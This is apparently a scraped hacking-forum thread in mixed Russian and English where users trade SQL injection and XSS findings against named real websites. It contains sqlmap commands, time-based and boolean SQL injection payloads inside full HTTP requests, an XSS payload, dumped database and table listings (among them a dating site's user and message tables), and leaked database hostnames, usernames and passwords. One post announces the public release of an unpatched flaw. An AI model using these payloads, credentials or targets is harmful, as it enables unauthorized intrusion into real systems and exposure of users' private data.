Найденные интересеные SQL inj & XSS

system45 · 31.01.2023

etc/passwd сказал(а):

Append to the text document and then -r path/to/file. Don't forget to put original value.

I put the orginal value , bur still not injectable

etc/passwd · 31.01.2023

system45 сказал(а):

Я поставил исходное значение, но все еще не инъекционный

--dbms=postgresql --level=5 --risk=3

grader · 31.01.2023

royal_ · 04.02.2023

https://conservatorygroup.ca/ access

https://hdc8655.ca/TradePortal/login.aspx SQLi in the login

factor · 05.02.2023

https://www.gays-cruising.com/api/?id=4573&op=vistaPreviaZonaInfoWidget -p id --no-cast --technique=B --tamper=luanginx,between

Database: cga
--------------------------------------
| Table | Entries |
--------------------------------------
| mensajes | 21495972 |
| mensajes_conversaciones | 4226864 |
| usuarios_favoritos | 3613990 |
| visitas_perfil | 2826969 |
| emails | 869029 |
| usuarios | 357214 |
| configuracion | 340713 |
| zonas_checkins | 223805 |
| busquedas_usuarios | 210911 |
| albumes_fotos | 203848 |
| suscriptores | 170561 |
| zonas_favoritos | 163108 |
| zonas_comentarios | 154265 |
| localidades | 129348 |
| usuarios_bloqueados | 120878 |
| zonas_votos | 116927 |
| usuarios_eliminados | 107114 |
| redirecciones | 98156 |
| zonas | 61269 |
| usuarios_datos_fisicos | 49102 |
| albumes | 48872 |
| oficinas | 37352 |
| baneos | 9217 |
| contacto | 8538 |
| zonas_notificaciones | 6857 |
| usuarios_denuncias | 3460 |
| regiones | 2054 |
| albumes_fotos_error | 894 |
| paises | 212 |
| zonas_comentarios_denuncias | 206 |
| entidades | 170 |
| zonas_tipos | 105 |
| top_localidades | 50 |
| top_paises | 50 |
| top_regiones | 50 |
| usuarios_denuncias_tipos | 35 |
| publicidad | 34 |
| sectores | 32 |
| medidas_altura | 28 |
| tipos_orientacion | 28 |
| tipos_rol | 28 |
| tipos_via | 24 |
| comunidades | 19 |
| medidas_peso | 19 |
| medidas_pene_longitud | 18 |
| continentes | 14 |
| medidas_pene_grosor | 8 |
| idiomas | 7 |
| errores | 6 |

Xavierr · 12.02.2023

https://www.shoeshowmega.com ---->> XSS
Payload = <a onmouseover%3d"alert(document.domain)">test<%2fa>

zloymen · 18.02.2023

MembRupt · 22.02.2023

https://bitxola.com/ajax/function.php

Код:

POST /ajax/function.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://bitxola.com/
Cookie: PHPSESSID=p6idj5gho4sls9a0sa4b60u7ae
Content-Length: 166
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: bitxola.com
Connection: Keep-alive

&action=LOGIN&email=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&password=login_password

https://bitxola.com/ajax/trading_live

Код:

POST /ajax/trading_live HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://bitxola.com/
Cookie: PHPSESSID=p6idj5gho4sls9a0sa4b60u7ae
Content-Length: 88
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: bitxola.com
Connection: Keep-alive

action=CHECK_TRADING_CURRENCY_PRICE&pairs=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z

k4rk4j0i · 22.02.2023

MembRupt сказал(а):

https://bitxola.com/ajax/function.php

Код:

POST /ajax/function.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://bitxola.com/
Cookie: PHPSESSID=p6idj5gho4sls9a0sa4b60u7ae
Content-Length: 166
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: bitxola.com
Connection: Keep-alive

&action=LOGIN&email=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&password=login_password

https://bitxola.com/ajax/trading_live

Код:

POST /ajax/trading_live HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://bitxola.com/
Cookie: PHPSESSID=p6idj5gho4sls9a0sa4b60u7ae
Content-Length: 88
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: bitxola.com
Connection: Keep-alive

action=CHECK_TRADING_CURRENCY_PRICE&pairs=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z

Уже было, сайт скам если что

BILASTINE · 27.02.2023

zloymen сказал(а):

Hidden content

Hidden content

gives forbidden now

Dolmabash · 06.03.2023

\\del

hackera · 09.03.2023

phpMyAdmin

134.122.23.123

define('DB_NAME', 'leads'); //Banco testes
define('DB_USER', 'acrux'); // database user
define('DB_PASS', 'vmYMwVk6JNFE7vg@'); // database password
define('DB_HOST', '134.122.23.123'); // database host *** use IP address to avoid DNS lookup

royal_ · 17.03.2023

mysql -u root -p'Hdtx2019@Wangyanchao' -h 112.126.98.6 -P 3306

royal_ · 17.03.2023

_________________________________

About Us

ETSI as European Standards Organization produces globally applicable standards for ICT-enabled systems, applications and services deployed across all sectors of industry and society

www.etsi.org

ETSI provides members with an open, inclusive and collaborative environment. This environment supports the timely development, ratification and testing of globally applicable standards for ICT-enabled systems, applications and services.

We are at the forefront of emerging technologies across all sectors of industry and society that make use of ICT. Our 900+ member organizations are drawn from over 60 countries and five continents.
__

ETSI is a European Standards Organization (ESO). We are the recognized regional standards body dealing with telecommunications, broadcasting and other electronic communications networks and services.

We have a special role in Europe. This includes supporting European regulations and legislation through the creation of Harmonised European Standards. Only standards developed by the three ESOs (CEN, CENELEC and ETSI) are recognized as European Standards (ENs).

sqlmap -u "https://portal.etsi.org/webapp/WorkProgram/Frame_WorkItemList.asp?SearchPage=TRUE&butExpertSearch= Search &qETSI_STANDARD_TYPE=&qETSI_NUMBER=&qTB_ID=833%3BmWT&qINCLUDE_SUB_TB=True&includeNonActiveTB=FALSE&qWKI_REFERENCE=&qTITLE=&qSCOPE=&qCURRENT_STATE_CODE=&qSTOP_FLG=N&qSTART_CURRENT_STATUS_CODE=12%3BI12&qEND_CURRENT_STATUS_CODE=12%3BI12&qFROM_MIL_DAY=&qFROM_MIL_MONTH=&qFROM_MIL_YEAR=&qTO_MIL_DAY=&qTO_MIL_MONTH=&qTO_MIL_YEAR=&qOPERATOR_TS=&qRAPTR_NAME=&qRAPTR_ORGANISATION=&qKEYWORD_BOOLEAN=OR&qKEYWORD=&qPROJECT_BOOLEAN=OR&qPROJECT_CODE=&includeSubProjectCode=FALSE&qSTF_List=&qDIRECTIVE=&qMandate_List=&qCLUSTER_BOOLEAN=OR&qCLUSTER=&qFREQUENCIES_BOOLEAN=OR&qFREQUENCIES=&qFreqLow=&qFreqLowUnit=1000&qFreqHigh=&qFreqHighUnit=1000&qSORT=HIGHVERSION&qREPORT_TYPE=SUMMARY&optDisplay=10&titleType=all"

Parameter: qSTOP_FLG (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: SearchPage=TRUE&butExpertSearch= Search &qETSI_STANDARD_TYPE=&qETSI_NUMBER=&qTB_ID=833;mWT&qINCLUDE_SUB_TB=True&includeNonActiveTB=FALSE&qWKI_REFERENCE=&qTITLE=&qSCOPE=&qCURRENT_STATE_CODE=&qSTOP_FLG=N' AND 4844=4844 AND 'YOGO'='YOGO&qSTART_CURRENT_STATUS_CODE=12;I12&qEND_CURRENT_STATUS_CODE=12;I12&qFROM_MIL_DAY=&qFROM_MIL_MONTH=&qFROM_MIL_YEAR=&qTO_MIL_DAY=&qTO_MIL_MONTH=&qTO_MIL_YEAR=&qOPERATOR_TS=&qRAPTR_NAME=&qRAPTR_ORGANISATION=&qKEYWORD_BOOLEAN=OR&qKEYWORD=&qPROJECT_BOOLEAN=OR&qPROJECT_CODE=&includeSubProjectCode=FALSE&qSTF_List=&qDIRECTIVE=&qMandate_List=&qCLUSTER_BOOLEAN=OR&qCLUSTER=&qFREQUENCIES_BOOLEAN=OR&qFREQUENCIES=&qFreqLow=&qFreqLowUnit=1000&qFreqHigh=&qFreqHighUnit=1000&qSORT=HIGHVERSION&qREPORT_TYPE=SUMMARY&optDisplay=10&titleType=all

web server operating system: Windows 2016 or 2019 or 10
web application technology: Microsoft IIS 10.0, ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2017
available databases [81]:
[*] [3GPP_REPORTINGDB]
[*] [E-Proxy2]
[*] [E-Proxy]
[*] ACMDB
[*] ADNDB
[*] AdobeSignAPIDB
[*] AdobeSignDB
[*] Algorithms
[*] AlgorithmsAndCodesDB
[*] AlgorithmsAndCodesDB_TEST
[*] ARMDB
[*] AuthorizationServiceDb
[*] BACKGROUNDJOB_DS
[*] BACKGROUNDJOB_MAF
[*] BackgroundJobVotingTool
[*] CONTRIB3GPPDB
[*] ContributionFeeDB
[*] CSC_ACCOUNT
[*] CSC_CMS
[*] CSC_DOCUMENT
[*] CSC_INFO
[*] CSC_MEETING
[*] CSC_NOTIFICATION
[*] CSC_REPORTING
[*] CVPDB
[*] DNN3GPP
[*] DNNPortal
[*] DSDB
[*] EcommerceDB
[*] EmailNotificationDB
[*] EPOCache
[*] FOLLOWUPDB
[*] FORAWATCHDB
[*] FPP_CLIENT
[*] HistoryServiceDB
[*] IISLOGDB
[*] INTEROPDB
[*] IODB
[*] IPV6DB
[*] IPv6DBPh2
[*] ISearchDb
[*] LISTSERV_DB
[*] M3GPP
[*] MAFDB
[*] MailDB
[*] MAPDB
[*] MAPDB_20180831
[*] master
[*] MemberVisit
[*] model
[*] msdb
[*] MTG3GPPDB
[*] NGPPDB
[*] NGPPDB_RESTORED20181001
[*] OneM2M_ACCOUNT
[*] OneM2M_CMS
[*] OneM2M_DOCUMENT
[*] OneM2M_INFO
[*] OneM2M_MEETING
[*] OneM2M_NOTIFICATION
[*] OneM2M_REPORTING
[*] OneM2M_VOTING_TOOL
[*] PDADB
[*] PORTALDB
[*] PROFILEDB
[*] PUBINFODB
[*] RPDB
[*] SADB
[*] SSISDB
[*] STF
[*] STFDB
[*] STFDB_Old
[*] TBVOTEDB3
[*] TBVOTEDB32
[*] tempdb
[*] TERMDB
[*] U3GPPDB
[*] VOTEDB
[*] VotingTool
[*] WPM_PDF_DB
[*] WPMDB

royal_ · 17.03.2023

_________________//////_________________

Venture Intelligence

ventureintelligence.com

royal_ · 29.03.2023

"C-MOTS Infotech is India’s leading financial market data and software solutions provider with a global presence. As an ISO 9001:2015 certified company, our focus is on providing services of the highest quality.
We offer innovative and robust web applications and solutions to suit the requirement of the end user. Our professional team adheres to a set of standards during the knowledge transfer process to enhance the efficiency and productivity of our clients.
Satisfaction of our stakeholders is important to us. Hence, we view our customers as our partners rather than buyers of our services. Ensuring smooth adaptation of our processes and ease of using our applications is our ultimate motto."

sqlmap -u "https://cmots.com/Admin/AdminIndex.aspx?opt=23&SrNo=139*" --cookie="admin session, login to get it" --tables --threads=5 --random-agent

web server operating system: Windows 7 or 2008 R2
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2000
available databases [75]:
[*] articles
[*] bsedata
[*] bulletin
[*] cline2002
[*] clineole
[*] clnotepad
[*] cmconfig
[*] Cmots_2015
[*] cmots_companyleads
[*] cmotsonlinecrm
[*] commondb
[*] corpgov
[*] customerfeedback
[*] hpclcaptions
[*] ipodata
[*] jmmc
[*] jmms
[*] jmtrading
[*] master
[*] masters
[*] miscclient
[*] model
[*] msdb
[*] myportfolio
[*] navindia
[*] news0501
[*] news0502
[*] news0601
[*] news0602
[*] news0701
[*] news0702
[*] news0801
[*] news0802
[*] news0901
[*] news0902
[*] news1001
[*] news1002
[*] News1101
[*] News1102
[*] News1201
[*] News1202
[*] news1301
[*] news1302
[*] News1401
[*] News1402
[*] News1501
[*] News1502
[*] news1601
[*] news1602
[*] news1701
[*] news1702
[*] news1801
[*] news1802
[*] news1901
[*] news1902
[*] news2001
[*] news2002
[*] news2101
[*] news2102
[*] news2201
[*] news2202
[*] news2301
[*] news2302
[*] newsarcadmin
[*] Northwind
[*] price
[*] pubs
[*] result
[*] stats
[*] status
[*] tempdb
[*] ubiforms
[*] utibank
[*] utiport-off
[*] webnews

CyberKill · 01.04.2023

Всем Привет Форумчане!

В конце февраля 2023 была найдена SQL уязвимость сайта Gazgolder.com

После проверки и открытия базы данных сайта последовал звонок в компанию Gazgolder, а именно SMM Директору Дмитрийю Миловзорову mti@gazgolder.com
При разговоре с ним и предложении рассказать об уязвимости, меня попросили отписаться на почту.
Прошел месяц, но ответ так и не последовал. Через две недели, после разговора с Дмитрием Миловзоровым мы решили написать команде разработчиков сайта.
Разработкой сайта занималась команда "Creative team". Мы также обратились к ним, найдя в базе данные их учетные данные для входа при разработке сайта.
За ними последовал ответ, что администрированием сайта они больше не занимаются. Но если понадобиться помощь в устранении уязвимости, они с радостью помогут.
Так как мы до сих пор не получили ответ, нам пришлось позвонить по всем номерам указанных в контактах сайта. Но к сожалению все менеджеры артистов отправляли нас к Дмитрийю Миловзорову.
И что самое удивительное, при повторном звонке Дмитрию, он так же попросил нас отписать на свою почту.
Прошел уже месяц!!! Спустя это время, при повторной проверки уязвимости, ошибка НЕ БЫЛА ИСПРАВЛЕНА.
К Великому сожалению я выкладываю SQL уязвимость в открытый доступ. А именно на сайт https://xss.pro
Огромное Спасибо (CheckerChin, etc/passwd, c0d3x, NecroMortis, k4rk4j0i)

dabdab · 01.04.2023

CyberKill сказал(а):

Всем Привет Форумчане!

В конце февраля 2023 была найдена SQL уязвимость сайта Gazgolder.com

После проверки и открытия базы данных сайта последовал звонок в компанию Gazgolder, а именно SMM Директору Дмитрийю Миловзорову mti@gazgolder.com
При разговоре с ним и предложении рассказать об уязвимости, меня попросили отписаться на почту.
Прошел месяц, но ответ так и не последовал. Через две недели, после разговора с Дмитрием Миловзоровым мы решили написать команде разработчиков сайта.
Разработкой сайта занималась команда "Creative team". Мы также обратились к ним, найдя в базе данные их учетные данные для входа при разработке сайта.
За ними последовал ответ, что администрированием сайта они больше не занимаются. Но если понадобиться помощь в устранении уязвимости, они с радостью помогут.
Так как мы до сих пор не получили ответ, нам пришлось позвонить по всем номерам указанных в контактах сайта. Но к сожалению все менеджеры артистов отправляли нас к Дмитрийю Миловзорову.
И что самое удивительное, при повторном звонке Дмитрию, он так же попросил нас отписать на свою почту.
Прошел уже месяц!!! Спустя это время, при повторной проверки уязвимости, ошибка НЕ БЫЛА ИСПРАВЛЕНА.
К Великому сожалению я выкладываю SQL уязвимость в открытый доступ. А именно на сайт https://xss.pro
Огромное Спасибо (CheckerChin, etc/passwd, c0d3x, NecroMortis, k4rk4j0i)

У меня одного этот пост диссонанс вызывает?
1) Найти уязвимость;
2) Скомпрометировать данные бд;
3) Позвонить SMM директору и рассказать о том что нашли;
4) Позвонить еще раз и опять рассказать;
5) Выложить в паблик.

Это возможно была бы смешная история «троллинга» (хотя не понятно кто кого «затроллил» то в итоге), если бы не .ru корни у таргета
Прошу прощения за оффтоп

barklay · 01.04.2023

dabdab сказал(а):

У меня одного этот пост диссонанс вызывает?
1) Найти уязвимость;
2) Скомпрометировать данные бд;
3) Позвонить SMM директору и рассказать о том что нашли;
4) Позвонить еще раз и опять рассказать;
5) Выложить в паблик.

Это возможно была бы смешная история «троллинга» (хотя не понятно кто кого «затроллил» то в итоге), если бы не .ru корни у таргета
Прошу прощения за оффтоп

Так а что с ней делать?

Это очень частая ситуация, ИБ финансируется по остаточному принципу как и внимание к инцидентам...

В целом сегодня первое апреля) Однако похоже на правду.
В любом случае лайк

.

GridsNetwork · 06.04.2023

sqlmap.py -u "https://www.allenedmondsbootssale.com/outlet.html?&gender=1"

WAT: Apache
Back-end: active fingerprint: MySQL >= 5.7
Error message fingerprint: MySQL
Banner: 5.7.40

available databases [2]:
[*] c3a0005_allenusa2
[*] information_schema

Найденные интересеные SQL inj & XSS

RAID-массив

(L3) cache

HDD-drive

HDD-drive

CD-диск

CD-диск

CD-диск

ripper

(L3) cache

RAID-массив

HDD-drive

HDD-drive

HDD-drive

HDD-drive

​

HDD-drive

HDD-drive

CD-диск

HDD-drive

(L2) cache

ripper